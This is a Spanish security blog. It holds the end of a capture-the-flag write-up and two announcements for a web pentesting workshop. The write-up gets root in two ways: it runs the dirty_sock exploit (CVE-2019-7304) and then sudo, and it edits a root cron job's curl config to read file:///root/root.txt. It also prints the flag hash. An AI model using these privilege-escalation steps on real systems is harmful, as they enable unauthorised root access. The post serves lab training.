<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="65" src="https://lh6.googleusercontent.com/9QLhUWTdbVV5DImDdsknPafb5nuniNXEqtazbSFIPxMhZFpCZU1H32yI3q4BpH2V7Yop4j8OEWupR1AygRZwxpujYSrc8l-EIXtTdeFl808-wOYCgRY0wJi3ubjFgSwmE-doqOR_" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="545" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Investigamos sobre la vulnerabilidad </span><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7304" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">CVE-2019-7304</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y el </span><a href="https://initblog.com/2019/dirty-sock" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">exploit</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> correspodiente en el repositorio </span><br />
<a href="https://github.com/initstring/dirty_sock" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://github.com/initstring/dirty_sock</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> . Pasamos a ejecutar el exploit en el directorio </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">/tmp</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="271" src="https://lh3.googleusercontent.com/N5f3jc6DNx-5WTvENCv7L3Uw9gMLPeMCOg333vy4XZtd31o90_RgflM7CmEyex-iPn05goawegT30dPHQkJqxx-jo8VyJJfaqwESQFG3k96If67ino1t-oGkXBDZwH98AXgPftMh" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="540" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="251" src="https://lh6.googleusercontent.com/u989IpX64VY5VwCwHIVFn32mirGvoRosH43rxXm3gncgz9N2DwCF8akmDkP31W3-aJS4YAgQ3R67LCYUMgDfxBxSJmsnjBmqMruilTLuq3ZQpPaRVGS9CYJSqX9MJYhTN01M7QPO" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="330" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Abrimos una nueva sesión de ssh con las credenciales </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">dirty_sock:dirty_sock </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">y hacemos </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo su</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="81" src="https://lh6.googleusercontent.com/wLn-j4bUh7INvxSgrwXkCKCuRDggDHaVDeVekN_DDxXNYibxetZ9NdREjWD5dajXqJ_xWzz5KICVdwVi7s8cyE1e6MskIEtHUGz-_Da2jVy6Ki3OKGkHhNhXiZuaV5X7lh7Aj0jL" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="530" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="194" src="https://lh5.googleusercontent.com/JwYiFGceBXEgGXbjIW1zUOG_Sng-whH7G-feu4-fsIsE09hGX_QYDyLeyiluKsWFJ3zipi32wqsgmk14MXSzk1lhbOdRlqs5dHb4PKCJMk5ccLLth0dSKfOrmx2u_uR4RKij26tL" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="522" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y ahí está root.txt > </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">82c198ab6fc5365fdc6da2ee5c26064a</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Otro método de privesc:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Intentamos ver los cambios a través de </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">diff</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> en los procesos usando el comando</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ps -ef > start.txt</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">y </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ps -ef > end.txt</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="106" src="https://lh6.googleusercontent.com/6HIF7qwFWGGd7EmB-dmfmJOtkgGEj0ri4G5Lm4T4AUB14YTZ-cHfEmaWcYyBLJXjDPnQ8TFCVcY1Tprk4vJRLRBCvOAUqGUMCtjlYYjbxrRecNcIG1fqnr-j8Y4K6BcMzoNWmz7A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="529" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Observamos en los procesos lo que hace </span><a href="https://en.wikipedia.org/wiki/Cron" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">CRON</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y encontramos los comandos de la ejecución continua de la tarea programada </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="47" src="https://lh6.googleusercontent.com/VbRzXixpzkbNG_w2UQkQgfX0fbZSyODRucc1JWrVPV4rbqbfOZbd4Cn5pRxNaA96-c6_MwjXI-JLQaruXwjkHYdTlBvTQOvF0RN7h-PSeMlk2kkrfVgqEpKrqspknQQll_npzxmN" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="519" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="85" src="https://lh6.googleusercontent.com/AQ8VVhQCgdPSuyltOPf_L3A4bFREfM8eHRbEn5HZOzBZOK33Dy-tvW2w5rQyarNMrMa4XbCzn5hRJ0Kb1g7n2FU_37fCkLFyi3pk-hgL-xd1uA2dYmsqflFDAVqKxLuJwuEC27UA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="508" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pasamos a ver que contiene el archivo </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">input</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> que es invocado por </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">curl -k </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">. Observamos que archivo </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">input poseé una entrada </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">url = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">"127.0.0.1"</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y es guardando continuamente en </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">report </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">la salida </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">de </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">bash curl -k /home/floris/admin-area/input</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Editamos input para que nuestro sistema a través de la tarea programada sea capaz de leer el </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">contenido de /root/root.txt de la siguiente forma </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">url = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: "consolas"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">"file:///root/root.txt"</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="144" src="https://lh4.googleusercontent.com/N8QWlGjFlvOzDoWhRoKGyE2yOXO0fC-5IBE-5GQALJhBgWCJSlY6VSkbYTcH1jLxv80DIas0TkB8uFwzTouvlVTrHOIFF2j621NSb0r0f4iCHrcCknLSyl8nDPFtes7_W-gTSl8y" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="398" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y de nuevo ahí está root.txt > </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">82c198ab6fc5365fdc6da2ee5c26064a</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="192" src="https://lh6.googleusercontent.com/PyFI0L39seXE6wHrxp_CGpwP7LK7hitrXi0cb-sP8i5AfJm-nP65IJR3X42IsaXs7d0-mwJCYPTJkHMdXeJz-EYKIg05auEZJ36sAQ82zklIPwjj9T-8AhKgxfCr19u8XzvhY1Ny" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="192" /></span></div>
<br />
<br />
<br />
<br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Twitter: </span><a href="https://twitter.com/1r0Dm48O" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">https://twitter.com/1r0Dm48O</span></a><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> </span>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019300 Molina de Aragón, Guadalajara, Spain40.8434667 -1.885056999999960740.8194427 -1.9253974999999608 40.8674907 -1.8447164999999606tag:blogger.com,1999:blog-4789894782637921835.post-20053399054463451512019-03-29T23:49:00.001+01:002019-03-29T23:49:20.562+01:00Ya disponibles las entradas para el próximo sábado Hacker sobre Pentesting Web<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhvfZcYgvTI0-GSmkMsGFxqfbRp5OJ9dJbO486tnJLaGhd6gltJUpmpgQzKYoPgKBhPVHlLAYOWn7b4uiOHJxKj4g1WlySyNndlkxBwF08G9t4qnRIU6-YmgvDCsSZKMLGJLi_X3-ETvu/s1600/cartel+sabados+hacker+PentestWeb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1600" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhvfZcYgvTI0-GSmkMsGFxqfbRp5OJ9dJbO486tnJLaGhd6gltJUpmpgQzKYoPgKBhPVHlLAYOWn7b4uiOHJxKj4g1WlySyNndlkxBwF08G9t4qnRIU6-YmgvDCsSZKMLGJLi_X3-ETvu/s640/cartel+sabados+hacker+PentestWeb.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Ya puedes reservar tu entrada para el próximo sábado hacker dedicado al pentesting web, si quieres asistir al evento puedes adquirir la tuya en el siguiente enlace:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
https://sabadohackerpentestweb.eventbrite.es</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-76831833765417591962019-03-24T10:18:00.001+01:002019-03-24T10:18:20.899+01:0027 de Abril, SabadoHacker: Memorias de un Pentester Web v.1<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSObmYZ2Go-sFEtj2tRRGuynX4sdNPAUstwOYUHf-HGyo0_jLyRVFiku9iToiajmBox1QCH09R14sH3-bwvn05i8b6lAWOu4WdKj67oyshoUQ8IhN5IksFI2bJD6VBPMUtJicGWg0mpaIJ/s1600/cartel+sabados+hacker+PentestWeb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1600" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSObmYZ2Go-sFEtj2tRRGuynX4sdNPAUstwOYUHf-HGyo0_jLyRVFiku9iToiajmBox1QCH09R14sH3-bwvn05i8b6lAWOu4WdKj67oyshoUQ8IhN5IksFI2bJD6VBPMUtJicGWg0mpaIJ/s640/cartel+sabados+hacker+PentestWeb.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
El próximo 27 de abril en el centro Asociado de la UNED se celebrara un nuevo #SabadoHacker de los programados para 2019. En esta ocasión el tema elegido sera Pentesting Web y el formato sera el de taller y resolución de casos prácticos. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
El encargado de impartir el taller sera Samuel Lopez (<span class="username u-dir" dir="ltr" style="background: rgb(230, 236, 240); color: #657786; direction: ltr !important; font-family: "Segoe UI", Arial, sans-serif; font-size: 14px; font-weight: 700; text-decoration-line: none !important; unicode-bidi: embed;"><a class="ProfileHeaderCard-screennameLink u-linkComplex js-nav" href="https://twitter.com/ElChicoDePython" style="background: rgb(230, 236, 240); color: #657786; font-family: "Segoe UI", Arial, sans-serif; font-size: 14px; font-weight: 700; text-decoration-line: none !important;">@<span class="u-linkComplex-target" style="font-weight: normal;">ElChicoDePython</span></a></span>) que preparara una plataforma con la que los asistentes puedan experimentar casos reales que el se ha encontrado en su día a día. Samuel Lopez es Auditor de seguridad en la empresa Mnemo y desarrollador Full Stack.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
La reserva de entradas se abrirá en breve, se ruega que permanezcáis atentos a twitter o este blog.</div>
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0